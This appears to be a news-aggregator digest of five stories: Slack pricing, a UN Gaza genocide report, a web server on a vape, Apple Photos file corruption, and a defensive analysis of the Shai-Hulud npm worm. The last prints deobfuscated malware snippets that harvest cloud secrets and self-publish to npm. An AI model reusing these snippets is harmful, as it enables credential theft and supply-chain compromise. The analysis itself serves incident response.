10 interesting stories served every morning and every evening.




1 2,627 shares, 143 trendiness

Slack is extorting us with a $195k/yr bill increase

An open letter, or something

For nearly 11 years, Hack Club - a nonprofit that provides coding education and community to teenagers worldwide - has used Slack as the tool for communication. We weren't freeloaders. A few years ago, when Slack transitioned us from their free nonprofit plan to a $5,000/year arrangement, we happily paid. It was reasonable, and we valued the service they provided to our community.

However, two days ago, Slack reached out to us and said that if we don't agree to pay an extra $50k this week and $200k a year, they'll deactivate our Slack workspace and delete all of our message history.

One could argue that Slack is free to stop providing us the nonprofit offer at any time, but in my opinion, a six-month grace period is the bare minimum for a massive hike like this, if not more. Essentially, Salesforce (a $230 billion company) is strong-arming a small nonprofit for teens, giving us less than a week to pony up a pretty massive sum of money or risk having all our communications cut off. That's absurd.

The small amount of notice has also been catastrophic for the programs that we run. Dozens of our staff and volunteers are now scrambling to update systems, rebuild integrations and migrate years of institutional knowledge. The opportunity cost of this forced migration is simply staggering.

Anyway, we're moving to Mattermost. This experience has taught us that owning your data is incredibly important, and if you're a small business especially, then I'd advise you to move away too.

This post was rushed out because, well, this has been a shock! If you'd like any additional details then feel free to send me an email.

...

Read the original on skyfall.dev »

2 1,230 shares, 45 trendiness

Top UN legal investigators conclude Israel is guilty of genocide in Gaza

The UN's top investigative body on Palestine and Israel ruled on Tuesday that Israel is guilty of the crime of genocide in Gaza, in the most authoritative pronouncement to date.

The 72-page report by the UN commission of inquiry on Palestine and Israel finds Israel has committed four of the five acts prohibited under the 1948 Genocide Convention, and that Israeli leaders had the intent to destroy Palestinians in Gaza as a group.

The finding echoes reports by Palestinian, Israeli and international rights groups that have reached the same conclusion over the past year.

But this is the first comprehensive legal probe by a UN body, serving as an indicator of a judgment by the International Court of Justice (ICJ), which is currently hearing a case by South Africa accusing Israel of genocide. The ICJ case is expected to take several years to be concluded.

"For the finding on Israel's responsibility for its conduct in Gaza, the commission used the legal standard set forth by the International Court of Justice. This is therefore the most authoritative finding emanating from the United Nations to date," Navi Pillay, the commission's chair, told Middle East Eye.

"Reports generated by the United Nations, including by a commission of inquiry, bear particular probative value and can be relied upon by all domestic and international courts."

Pillay, a prominent jurist who previously served as the UN's high commissioner for human rights and the president of the International Criminal Tribunal for Rwanda, said all states had an unequivocal legal obligation to prevent the genocide in Gaza. She also urged the UK government to review its stance on the Gaza genocide, including its refusal to label it as such.

"The obligation to prevent genocide arises when states learn of the existence of a serious risk of genocide and thus states, including the UK, must act without the need to wait for a judicial determination to prevent genocide," she said.

Another member of the commission, Chris Sidoti, told MEE that states must act now to prevent genocide. "There is no excuse now for not acting," he said.

"The UN report will remain the most authoritative statement until the International Court of Justice completes and rules on the genocide case brought against Israel."

The report is due to be presented to the UN General Assembly in October.

It calls on UN member states to take several measures, including halting arms transfers to Israel and imposing sanctions against Israel and individuals or corporations that are involved in or facilitating genocide or incitement to commit the crime.

The report concluded that Israel has committed genocide against Palestinians in Gaza since 7 October 2023, covering the period from that date until 31 July 2025.

It said that Israel has committed four acts of genocide:

Killing members of the group: Palestinians were killed in large numbers through direct attacks on civilians, protected persons, and vital civilian infrastructure, as well as by the deliberate creation of conditions that led to death.

Causing serious bodily or mental harm: Palestinians suffered torture, rape, sexual assault, forced displacement, and severe mistreatment in detention, alongside widespread attacks on civilians and the environment.

Inflicting conditions of life calculated to destroy the group: Israel deliberately imposed inhumane living conditions in Gaza, including destruction of essential infrastructure, denial of medical care, forced displacement, blocking of food, water, fuel, and electricity, reproductive violence, and starvation as a method of warfare. Children were found to be particularly targeted.

Preventing births within the group: The attack on Gaza's largest fertility clinic destroyed thousands of embryos, sperm samples, and eggs. Experts told the commission this would prevent thousands of Palestinian children from ever being born.

In addition to the genocidal acts, the investigation concluded that the Israeli authorities and security forces have the genocidal intent to destroy, in whole or in part, the Palestinians in the Gaza Strip.

Genocidal intent is often the hardest to prove in any genocide case. But the authors of the report have found "fully conclusive evidence" of such intent.

They cited statements made by Israeli authorities, including President Isaac Herzog, Prime Minister Benjamin Netanyahu and Yoav Gallant - who served as defence minister for much of the war - as direct evidence of genocidal intent.

It also found that the three leaders have committed the crime of incitement to genocide, a substantive crime under Article III of the convention, regardless of whether genocide was committed.

Additionally, on the basis of circumstantial evidence, the commission found that genocidal intent was the "only reasonable inference" that could be drawn based on the pattern of conduct of the Israeli authorities. That is the same standard of proof that will be used by the ICJ in its current proceedings against Israel.

The commission said it identified six patterns of conduct by Israeli forces in Gaza that support an inference of genocidal intent:

Mass killings: Israeli forces have killed and seriously harmed an unprecedented number of Palestinians since 7 October 2023, mostly civilians, using heavy munitions in densely populated areas. By 15 July 2025, 83 percent of those killed were civilians, the report found. Nearly half were women and children.

Cultural destruction: The systematic leveling of homes, schools, mosques, churches, and cultural sites was cited as evidence of an effort to erase Palestinian identity.

Deliberate suffering: Despite three provisional orders from the ICJ and repeated international warnings, Israel continued policies knowing Palestinians were trapped and unable to flee, the commission said.

Collapse of healthcare: Israeli forces targeted Gaza's healthcare system, attacking hospitals, killing and abusing medical personnel, and blocking vital supplies and patient evacuations.

Sexual violence: Investigators documented sexualised torture, rape, and other forms of gender-based violence, describing them as tools of collective punishment.

Targeting children: Children were shot by snipers and drones, including during evacuations and at shelters, with some killed while carrying white flags.

"Israeli political and military leaders are agents of the State of Israel; therefore, their acts are attributable to the State of Israel," the report read.

"The State of Israel bears responsibility for the failure to prevent genocide, the commission of genocide and the failure to punish genocide against the Palestinians in the Gaza Strip."

The three-member commission of inquiry was established in May 2021 by the Geneva-based UN Human Rights Council (HRC) with a permanent mandate to investigate international humanitarian and human rights law violations in occupied Palestine and Israel from April 2021.

The commission is mandated to report annually to the HRC and the UN General Assembly. Its members are independent experts, unpaid by the UN, on an open-ended mandate.

The commission's reports are highly authoritative and are widely cited by international legal bodies, including the ICJ and the International Criminal Court in The Hague.

Over the past four years, it has produced some of the most groundbreaking reports on international law breaches in Israel and Palestine.

Since 7 October 2023, the commission has issued three reports and three papers on international law breaches by different parties.

Previous reports have concluded that Israeli forces have committed crimes against humanity and war crimes in Gaza, including, among others, extermination, torture, rape, sexual violence and starvation as a method of warfare. They also concluded that two acts of genocide had been committed in Gaza.

Its three members are eminent human rights and legal experts.

Pillay served as UN high commissioner for human rights from 2008 to 2014. She previously served as a judge of the International Criminal Court and presided over the UN's ad hoc tribunal for Rwanda.

Miloon Kothari served as the first UN special rapporteur on adequate housing between 2000 and 2008, while Sidoti is the former Australian human rights commissioner and previously served as a member of the UN Independent International Fact-Finding Mission on Myanmar from 2017 to 2019.

...

Read the original on www.middleeasteye.net »

3 1,218 shares, 48 trendiness

Hosting a WebSite on a Disposable Vape

This article is NOT served from a web server running on a disposable vape. If you want to see the real deal, click here. The content is otherwise identical.

For a couple of years now, I have been collecting disposable vapes from friends and family. Initially, I only salvaged the batteries for "future" projects (it's not hoarding, I promise), but recently, disposable vapes have gotten more advanced. I wouldn't want to be the lawyer who one day will have to argue how a device with USB-C and a rechargeable battery can be classified as "disposable". Thankfully, I don't plan on pursuing law anytime soon.

Last year, I was tearing apart some of these fancier pacifiers for adults when I noticed something that caught my eye: instead of the expected black blob of goo hiding some ASIC (Application Specific Integrated Circuit), I saw a little integrated circuit inscribed PUYA. I don't blame you if this name doesn't excite you as much as it does me; most people have never heard of them. They are best known for their flash chips, but I first came across them after reading Jay Carlson's blog post about the cheapest flash microcontroller you can buy. They are quite capable little ARM Cortex-M0+ micros.

Over the past year I have collected quite a few of these PY32-based vapes, all of them different models of vape from the same manufacturer. It's not my place to do free advertising for big tobacco, so I won't mention the brand I got them from, but if anyone who worked on designing them reads this, thanks for labeling the debug pins!

The chip is marked PUYA C642F15, which wasn't very helpful. I was pretty sure it was a PY32F002A, but after poking around with pyOCD, I noticed that the flash was 24k and we have 3k of RAM. The extra flash meant that it was more likely a PY32F002B, which is actually a very different chip.

So here are the specs of a microcontroller so bad, it's basically disposable:

* 24 KiB of flash

* 3 KiB of RAM

* a few peripherals, none of which we will use.

You may look at those specs and think that it's not much to work with. I don't blame you: a 10-year-old phone can barely load Google, and this is about 100x slower. I, on the other hand, see a blazingly fast web server.

The idea of hosting a web server on a vape didn't come to me instantly. In fact, I have been playing around with them for a while, but after writing my post on semihosting, the penny dropped.

If you don't feel like reading that article, semihosting is basically syscalls for embedded ARM microcontrollers. You throw some values/pointers into some registers and execute a breakpoint instruction. An attached debugger interprets the values in the registers and performs certain actions. Most people just use this to get some logs printed from the microcontroller, but it is actually bi-directional.

If you are older than me, you might remember a time before Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get online. You might also know that the ghosts of those modems still linger all around us. Almost all USB serial devices actually emulate those modems: a 56k modem is just a 57600 baud serial device. Data between some of these modems was transmitted using a protocol called SLIP (Serial Line Internet Protocol).

This may not come as a surprise, but Linux (and with some tweaking even macOS) supports SLIP. The slattach utility can make any /dev/tty* send and receive IP packets. All we have to do is put the data down the wire in the right format and provide a virtual tty. This is actually easier than you might imagine: pyOCD can forward all semihosting through a telnet port. Then, we use socat to link that port to a virtual tty:

Ok, so we have a "modem", but that's hardly a web server. To actually talk TCP/IP, we need an IP stack. There are many choices, but I went with uIP because it's pretty small, doesn't require an RTOS, and it's easy to port to other platforms. It also, helpfully, comes with a very minimal HTTP server example.

After porting the SLIP code to use semihosting, I had a working web server… half of the time. As with most highly optimised libraries, uIP was designed for 8- and 16-bit machines, which rarely have memory alignment requirements. On ARM, however, if you dereference a u16 *, you had better hope that address is even, or you'll get an exception. The uip_chksum assumed u16 alignment, but the script that creates the filesystem didn't. I decided to modify the structure of the filesystem a bit to make it more portable. This was my first time working with Perl and I have to say, it's quite well suited to this kind of task.
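The checksum at the heart of that bug is the standard internet checksum, which walks the buffer as 16-bit words; that word-at-a-time view is exactly where the alignment assumption creeps in. Here is a rough Python rendering of the RFC 1071 arithmetic (a sketch for illustration, not uIP's actual C code):

```python
def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words.
    An odd trailing byte is treated as if padded with a zero byte."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
    return ~total & 0xFFFF

# RFC 1071's worked example: the checksum of these 8 bytes is 0x220D
assert inet_checksum(bytes([0x00, 0x01, 0xF2, 0x03, 0xF4, 0xF5, 0xF6, 0xF7])) == 0x220D
```

In C, reading those 16-bit words through a u16 * is only safe when the buffer starts on an even address, which is why the misaligned filesystem entries faulted on ARM.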

So how fast is a web server running on a disposable microcontroller? Well, initially, not very fast. Pings took ~1.5s with 50% packet loss, and a simple page took over 20s to load. That's so bad, it's actually funny, and I kind of wanted to leave it there.

However, the problem was actually between the seat and the steering wheel the whole time. The first implementation read and wrote a single character at a time, which had a massive overhead associated with it. I previously benchmarked semihosting on this device at ~20KiB/s, but uIP's SLIP implementation was designed for very low memory devices, so it was serialising the data byte by byte. We have a whopping 3KiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll function. I also split writes into batches to allow for escaping.
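Batching the writes works because SLIP only has two special bytes that ever need escaping. The framing rules from RFC 1055 can be sketched in Python (the function name is mine, not uIP's):

```python
# RFC 1055 SLIP special bytes
END, ESC, ESC_END, ESC_ESC = 0xC0, 0xDB, 0xDC, 0xDD

def slip_encode(payload: bytes) -> bytes:
    """Escape END/ESC bytes per RFC 1055 and terminate the frame with END."""
    out = bytearray()
    for b in payload:
        if b == END:
            out += bytes([ESC, ESC_END])   # literal 0xC0 becomes DB DC
        elif b == ESC:
            out += bytes([ESC, ESC_ESC])   # literal 0xDB becomes DB DD
        else:
            out.append(b)
    out.append(END)                        # frame delimiter
    return bytes(out)

assert slip_encode(b"\x01\xc0\x02") == b"\x01\xdb\xdc\x02\xc0"
```

Since runs of ordinary bytes need no escaping, they can be written to the host in one semihosting call, which is where the speedup comes from.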

Now this is what I call blazingly fast! Pings now take 20ms with no packet loss, and a full page loads in about 160ms. This was using almost all of the RAM, but I could also dial down the buffer sizes to leave more than enough headroom to run other tasks. The project repo has everything set to a nice balance of latency and RAM usage:

Memory region         Used Size  Region Size  %age Used
           FLASH:        5116 B        24 KB     20.82%
             RAM:        1380 B         3 KB     44.92%

For this blog however, I paid for none of the RAM, so I'll use all of the RAM.

As you may have noticed, we have just under 20KiB (80%) of storage space left. That may not be enough to ship all of React, but as you can see, it's more than enough to host this entire blog post. And this is not just a static page server; you can run any server-side code you want, if you know C, that is.

Just for fun, I added a JSON API endpoint that returns the number of requests to the main page (since the last crash) and the unique ID of the microcontroller.
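The post doesn't show that endpoint's C source, so here is only a hypothetical Python sketch of the kind of response such a handler might produce (the field names are made up for illustration):

```python
import json

def stats_response(request_count: int, uid_hex: str) -> str:
    """Build a minimal HTTP/1.0 response carrying a stats JSON body.
    Field names ("requests", "uid") are assumptions, not the real API."""
    body = json.dumps({"requests": request_count, "uid": uid_hex})
    return (
        "HTTP/1.0 200 OK\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )

print(stats_response(42, "deadbeef"))
```

On the real device this would be a C handler writing the same bytes straight out of uIP's transmit buffer.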

...

Read the original on bogdanthegeek.github.io »

4 1,115 shares, 45 trendiness

Apple Photos App Corrupts Images

The Apple Photos app sometimes corrupts images when importing from my camera. I just wanted to make a blog post about it in case anyone else runs into the problem. I've seen other references to this online, but most of the people gave up trying to fix it, and none of them went as far as I did to debug the issue.

I'll try to describe the problem and the things I've tried to do to fix it. But also note that I've (sort of) given up on the Photos app too. Since I can't trust it to import photos from my camera, I switched to a different workflow.

Here is a screenshot of a corrupted image in the Photos app:

I've got an OM System OM-1 camera. I used to shoot in RAW + jpg, then when I would import to the Photos app, I would check the "delete photos after import" checkbox in order to empty the SD card. Turns out "delete after import" was a huge mistake.

I'm pretty sure I'd been getting corrupted images for a while, but it would only be 1 or 2 images out of thousands, so I thought nothing of it (it was probably my fault anyway, right?)

But the problem really got me upset when, last year, I went to a family member's wedding and took tons of photos. Apple Photos combines RAW + jpg photos so you don't have a bunch of duplicates, and when you view the images in the Photos app, it just shows you the jpg version by default. After I imported all of the wedding photos, I noticed some of them were corrupted. Upon closer inspection, I found that it sometimes had corrupted the jpg, sometimes the RAW file, and sometimes both. Since I had been checking the "delete after import" box, I didn't know whether the images on the SD card were corrupted before importing or not. After all, the files had been deleted, so there was no way to check.

I estimate I completely lost about 30% of the images I took that day.

Losing so many photos really rattled me, but I wanted to figure out the problem so I didn't lose images in the future.

I was worried this was somehow a hardware problem. Copying files seems so basic, I didn't think there was any way a massively deployed app like Photos could fuck it up (especially since its main job is managing photo files). So, to narrow down the issue, I changed out all of the hardware. Here are all the things I did:

* Bought a new SD card direct from the manufacturer (to eliminate the possibility of buying a bootleg SD card)

* Switched to only shooting in RAW (if importing messes up 30% of my images, but I cut the number of images I import by half, then that should be fewer corrupted images right? lol)

I did each of these steps over time, so as to only change one variable at a time, and still the image corruption persisted. I didn't really want to buy a new camera, the MKii is not really a big improvement over the OM-1, but we had a family trip coming up, and the idea that pressing the shutter button on the camera might not actually record the image didn't sit well with me.

Since I had replaced literally all of the hardware involved, I knew it must be a software problem. I stopped checking the "delete after import" button and started reviewing all of the photos after import. Only after verifying none of them were corrupt would I format the SD card. I did this for months without finding any corrupt files. At this point I figured it was somehow a race condition or something when copying the photo files and deleting them at the same time.
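That review-then-format routine can be automated: refuse to wipe the card until every file on it has a byte-identical copy at the import destination. A hedged Python sketch of the idea (the directory layout and matching-by-filename are my assumptions, not the author's script):

```python
import hashlib
from pathlib import Path

def file_digest(path: Path) -> str:
    """SHA-256 of a file's full contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def safe_to_format(card_dir: Path, imported_dir: Path) -> bool:
    """True only if every file on the card has a byte-identical copy
    (matched by filename, for this sketch) in the import destination."""
    for src in card_dir.rglob("*"):
        if not src.is_file():
            continue
        dst = imported_dir / src.name
        if not dst.is_file() or file_digest(src) != file_digest(dst):
            return False  # missing or corrupted copy: do not format the card
    return True
```

Comparing digests rather than sizes matters here, since (as shown below) the corrupted files kept exactly the same size.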

However, after I got home from RailsConf and imported my photos, I found one corrupt image (the one above). I was able to verify that the image was not corrupt on the SD card, so the camera was working fine (meaning I probably didn't need to buy a new camera body at all).

I tried deleting the corrupt file and re-importing the original to see if it was something about that particular image, but it re-imported just fine. In other words, it seems like the Photos app will corrupt files randomly.

I don't know if this is a problem that is specific to OM System cameras, and I'm not particularly interested in investing in a new camera system just to find out.

If I compare the corrupted image with the non-corrupted image, the file sizes are exactly the same, but the bytes are different:

aaron@tc ~/Downloads> md5sum P7110136-from-camera.ORF Exports/P7110136.ORF
17ce895fd809a43bad1fe8832c811848  P7110136-from-camera.ORF
828a33005f6b71aea16d9c2f2991a997  Exports/P7110136.ORF
aaron@tc ~/Downloads> ls -al P7110136-from-camera.ORF Exports/P7110136.ORF
-rw-------@ 1 aaron staff 18673943 Jul 12 04:38 Exports/P7110136.ORF
-rwx------  1 aaron staff 18673943 Jul 17 09:29 P7110136-from-camera.ORF*

P7110136-from-camera.ORF is the non-corrupted file, and Exports/P7110136.ORF is the corrupted file from the Photos app. Here's a screenshot of the preview of the non-corrupted photo:

Here is the binary diff between the files. I ran both files through xxd and then diffed them. Also, if anyone cares to look, I've posted the RAW files here on GitHub.
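The same comparison can be done without xxd: walk both byte strings in lockstep and report the offsets where they diverge. A small Python sketch of that idea:

```python
def differing_offsets(a: bytes, b: bytes, limit: int = 10) -> list[int]:
    """Offsets at which two equal-length byte strings differ (first `limit` hits)."""
    assert len(a) == len(b), "the corrupted and original files are the same size here"
    hits = []
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            hits.append(i)
            if len(hits) == limit:
                break
    return hits

# In practice: differing_offsets(Path("P7110136-from-camera.ORF").read_bytes(),
#                                Path("Exports/P7110136.ORF").read_bytes())
assert differing_offsets(b"abcdef", b"abXdeY") == [2, 5]
```

Knowing whether the bad bytes cluster in one region or scatter across the file is a useful first clue about how the copy went wrong.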

I'm not going to put any more effort into debugging this problem, but I wanted to blog about it in case anyone else is seeing the issue. I take a lot of photos and, to be frank, most of them are not very good. I don't want to look through a bunch of bad photos every time I look at my library, so culling photos is important. Culling photos in the Photos app is way too cumbersome, so I've switched to using Darktable. Now all of my photos go through Darktable first, where I:

* Delete the ones I don't like

* Process ones I do like

* Export both the jpg and the original raw file

* Import those to the Photos app so they're easy to view and share

I've not seen any file corruption when importing to Darktable, so I am convinced this is a problem with the Photos app. But now, since all of my images land in Darktable before making their way to the Photos app, I don't really care anymore. The bad news is that I've spent a lot of time and money trying to debug this. I guess the good news is that now I have redundant hardware!

...

Read the original on tenderlovemaking.com »

5 1,065 shares, 42 trendiness

ctrl/tinycolor and 40+ NPM Packages Compromised

The popular @ctrl/tinycolor package with over 2 million weekly downloads has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack dubbed "Shai-Hulud". The malware self-propagates across maintainer packages, harvests AWS/GCP/Azure credentials using TruffleHog, and establishes persistence through GitHub Actions backdoors, representing a major escalation in NPM ecosystem threats.

The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats: the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.

In this post, we'll dive deep into the payload's mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation, targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.

To help the community respond to this incident, StepSecurity hosted a Community Office Hour on September 16th at 1 PM PT. The recording is available here: https://www.youtube.com/watch?v=D9jXoT1rtaQ

The attack unfolds through a sophisticated multi-stage chain that leverages Node.js's process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.

The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.

The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID. For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. The malware specifically targets the following credentials:

The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub's /git/refs endpoint.

The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named Shai-Hulud via the GitHub /user/repos API.

The entire attack design assumes Linux or macOS execution environments, checking for os.platform() === 'linux' || 'darwin'. It deliberately skips Windows systems.
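The AWS access-key pattern cited above is easy to reproduce. As a hedged illustration (not the malware's actual code), here is how a scanner would match that key format and how little a process.env dump needs to do to pick up live tokens:

```python
import os
import re

# Pattern quoted in the analysis: AWS access key IDs start with AKIA
AWS_KEY_RE = re.compile(r"AKIA[0-9A-Z]{16}")

# Variable names mentioned in the write-up; the real malware grabs far more
INTERESTING = ("GITHUB_TOKEN", "AWS_ACCESS_KEY_ID", "NPM_TOKEN")

def find_aws_keys(text: str) -> list[str]:
    """Return every AKIA-style access key ID found in `text`."""
    return AWS_KEY_RE.findall(text)

def exposed_env() -> dict:
    """What an environment dump would capture from this process."""
    return {k: v for k, v in os.environ.items() if k in INTERESTING}

assert find_aws_keys("key=AKIAABCDEFGHIJKLMNOP;") == ["AKIAABCDEFGHIJKLMNOP"]
```

This is why credentials in environment variables or dotfiles are exposed to *any* code that runs at install time; no exploit is needed beyond executing a postinstall script.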
For a visual breakdown, see the attack flow diagram below.

The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but a modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers. The payload imports six core modules, each serving a specific function in the attack chain.

This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.

The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.

// Deobfuscated AWS harvest snippet
async getAllSecretValues() {
  const secrets = [];
  let nextToken;
  do {
    const resp = await client.send(new ListSecretsCommand({ NextToken: nextToken }));
    for (const secret of resp.SecretList || []) {
      const value = await client.send(new GetSecretValueCommand({ SecretId: secret.ARN }));
      secrets.push({ ARN: secret.ARN, SecretString: value.SecretString, SecretBinary: atob(value.SecretBinary) }); // Base64 decode binaries
    }
    nextToken = resp.NextToken;
  } while (nextToken);
  return secrets;
}

The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.

The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects/*/secrets/*. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.

This module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.

The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.

// Deobfuscated NPM update snippet

async updatePackage(pkg) {
  // Patch package.json (add self as dep?) and publish
  await exec(`npm version patch --force && npm publish --access public --token ${token}`);
}

This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infect all other packages maintained by that user.

The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941). Here is the line-by-line bash script deconstruction:

# Deobfuscated code snippet

#!/bin/bash
GITHUB_TOKEN="$1"
BRANCH_NAME="shai-hulud"
FILE_NAME=".github/workflows/shai-hulud-workflow.yml"
FILE_CONTENT=$(cat <

This workflow is executed as soon as the compromised package creates a commit with it, which immediately exfiltrates all the secrets.

The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function makeRepo('Shai-Hulud'). The repository is public by default to ensure easy access for the command and control infrastructure.

We are observing hundreds of such public repositories containing exfiltrated credentials. A GitHub search for "Shai-Hulud" repositories reveals the ongoing and widespread nature of this attack, with new repositories being created as more systems execute the compromised packages.

This exfiltration technique is similar to the Nx supply chain attack we analyzed previously, where attackers also used public GitHub repositories to exfiltrate stolen credentials. This pattern of using GitHub as an exfiltration endpoint appears to be a preferred method for supply chain attackers, as it blends in with normal developer activity and bypasses many traditional security controls.

These repositories contain sensitive information. The public nature of these repositories means that any attacker can access and potentially misuse these credentials, creating a secondary risk beyond the initial compromise.

The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate "security scan".

We analyzed the malicious payload using StepSecurity Harden-Runner in a GitHub Actions workflow. Harden-Runner successfully flagged the suspicious behavior as anomalous.
The pub­lic in­sights from this test re­veal how the pay­load works:The com­pro­mised pack­age made unau­tho­rized API calls to api.github.com dur­ing the npm in­stall process­These API in­ter­ac­tions were flagged as anom­alous since le­git­i­mate pack­age in­stal­la­tions should not be mak­ing such ex­ter­nal API call­s­These run­time de­tec­tions con­firm the so­phis­ti­cated na­ture of the at­tack, with the mal­ware at­tempt­ing cre­den­tial har­vest­ing, self-prop­a­ga­tion to other pack­ages, and data ex­fil­tra­tion - all dur­ing what ap­pears to be a rou­tine pack­age in­stal­la­tion.The fol­low­ing in­di­ca­tors can help iden­tify sys­tems af­fected by this at­tack:Use these GitHub search queries to iden­tify po­ten­tially com­pro­mised repos­i­to­ries across your or­ga­ni­za­tion:Re­place ACME with your GitHub or­ga­ni­za­tion name and use the fol­low­ing GitHub search query to dis­cover all in­stance of shai-hu­lud-work­flow.yml in your GitHub en­vi­ron­ment.To find ma­li­cious branches, you can use the fol­low­ing Bash script:# List all re­pos and check for shai-hu­lud branch

gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | while read repo; do

  gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'

done

The malicious bundle.js file has a SHA-256 hash of 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09.

The following packages have been confirmed as compromised:

If you use any of the affected packages, take these actions immediately:

# Check for affected packages in your project

npm ls @ctrl/tinycolor

# Remove com­pro­mised pack­ages

npm unin­stall @ctrl/tinycolor

# Search for the known ma­li­cious bun­dle.js by hash

find . -type f -name "*.js" -exec sha256sum {} \; | grep 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09

# Check for and remove the backdoor workflow

rm -f .github/workflows/shai-hulud-workflow.yml

# Look for suspicious 'shai-hulud' branches in all repositories

git ls-remote --heads origin | grep shai-hulud

# Delete any ma­li­cious branches found

git push origin --delete shai-hulud

The malware harvests credentials from multiple sources. Rotate ALL of the following, including any credentials stored in AWS Secrets Manager or GCP Secret Manager.

Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.

Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.

# Check CloudTrail for suspicious secret access
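As an alternative to the find-and-grep command above, the file-hash check can be scripted. The following is a minimal sketch (the hash is the published IOC for the malicious bundle.js; the function names are illustrative, not part of any official tooling):

```python
import hashlib
import os

# SHA-256 of the known-malicious bundle.js (IOC from this incident)
IOC_HASH = "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"

def sha256_of(path):
    """Compute the SHA-256 hex digest of a file, reading in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_ioc(root):
    """Walk a directory tree and return paths of .js files matching the IOC hash."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".js"):
                path = os.path.join(dirpath, name)
                if sha256_of(path) == IOC_HASH:
                    hits.append(path)
    return hits
```

Run it against each checkout (e.g. `find_ioc("./node_modules")`) and treat any hit as a confirmed compromise.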

aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue

aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets

aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

# Review IAM credential reports for unusual activity

aws iam get-credential-report --query 'Content'

For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.

# Review Secret Manager access logs

